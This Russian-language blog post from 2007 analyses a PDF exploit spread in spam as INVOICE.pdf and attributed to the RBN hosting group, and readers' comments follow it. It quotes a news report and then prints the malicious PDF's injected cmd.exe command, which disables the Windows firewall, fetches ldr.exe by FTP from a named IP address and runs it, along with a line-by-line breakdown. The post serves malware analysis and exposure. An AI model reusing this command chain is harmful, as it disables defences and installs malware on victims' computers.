пятница, 26 октября 2007 г.

RBN: PDF эксплоит

Мы любим РБН за то, что они верны себе. Их черный флаг гордо реет а курс не меняется чтобы не происходило вокруг их имени.
Яркий пример:

Семантек обьявляет о нахождении эксплоита в PDF файлах (касперские детектят с 17 числа):

http://www.securitylab.ru/news/306212.php

Вредоносный документ PDF, использующий баги в программном обеспечении Adobe Systems Reader и Acrobat, выпущен на волю, сообщила компания Symantec во вторник — спустя всего несколько часов после того, как Adobe предложила исправления для своих программ.
«Эта массовая рассылка файлов эксплойта может быть попыткой использовать промежуток времени между выпуском патча и его повсеместной установкой», — пишет Symantec в предупреждении для клиентов своей информационной сети DeepSight. Вредоносный документ PDF вложен в спамерское письмо и носит имя YOUR_BILL.pdf или INVOICE.pdf. Он использует уязвимость протокола mailto:, выявленную более месяца назад британским исследователем Петко Петковым.

В понедельник Adobe исправила ошибку и выпустила обновленные редакции Reader и Acrobat. Пользователям более ранних версий популярных программ предлагается либо перейти на 8.1.1, либо применить одно из временных решений, предложенных Adobe для отражения атак. В понедельник Adobe пообещала обновить Adobe Reader 7.0.9 и Acrobat 7.0.9, но конкретные сроки не назвала.

Когда получатель открывает файл PDF, тот запускает троянского коня с именем Pidief.a, который отключает межсетевой экран Windows и загружает в компьютер другую программу. Это специальный загрузчик, способный извлекать файлы из удаленного сервера и внедрять их в зараженный ПК по команде хозяина. «Этот сервер все еще работает и продолжает обслуживать загрузчик через FTP», — предупредила Symantec во вторник утром, добавив, что сервер представляет собой хорошо известное место хостинга вредоносного ПО.

Хотя Adobe исправила последние версии Reader и Acrobat, на самом деле уязвимость лежит на совести Microsoft, которая призналась в этом две недели назад, пообещав исправить в Windows XP и Windows Server 2003 блоки управления такими общеупотребительными протоколами, как mailto:. Эксплойт PDF опасен только для пользователей браузера Internet Explorer 7 на системах XP или Windows Server 2003. Symantec рекомендует «как можно быстрее применить патчи, предложенные в Adobe Advisory APSB07-18».

Как вы думаете где загрузчик?

Фрагмент PDF:

##5 0 obj<>dendobjd6 0 obj###<<###/CropBox[0 0 595 842]/Parent 1 0 R/Contents 13 0 R/Rotate 0/Group<
###<####/I true/CS/DeviceRGB/S/Transparency>>/MediaBox[0 0 595 842]/Resources 7 0 R/Type/Page/AA<>>>dendobjd14 0 obj<%/../../../../../../Windows/system32/cmd".exe"" /c /q \"@echo off&netsh firewall set opmode mode=disable&echo o 81.95.146.130>1&echo b
inary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&\" \"&\" "nul.bat)/S/URI>>dendobjd1 0 obj<
Примерно вот так это выглядит, если по-русски:

/Windows/system32/cmd".exe"" /c /q
@echo off
netsh firewall set opmode mode=disable
echo o 81.95.146.130
echo binary
echo get /ldr.exe
echo quit
ftp -s:1 -v -A>nul
del /q
start ldr.exe

Адрес принадлежит конечно РБН:

4 комментария:

Urs комментирует...

RBN отреагировал на жалобу. Спрейдинг уехал в Малазию.

Что характерно, они все имеют запасной аэродром в Малазии.

Urs комментирует...

IP 203.121.69.116

Urs комментирует...

Ага по поводу запасных аэродромов. Блог поклонников РБН опубликовал список адресных пулов используемых РБН.

http://bp3.blogger.com/_SvDjzn4xfyE/Rx2J3wYdwoI/AAAAAAAAADE/aOIRm9XqErk/s1600/rbn_fake_table_2.jpg

Малазийский адрес входит в этот пул. Следовательно реакция РБН на абьюзы полная чушь, они всего лишь переводят клиента на свои сервера в Малазию.

Urs комментирует...

ах да, поклонники РБН живут здесь:

http://rbnexploit.blogspot.com/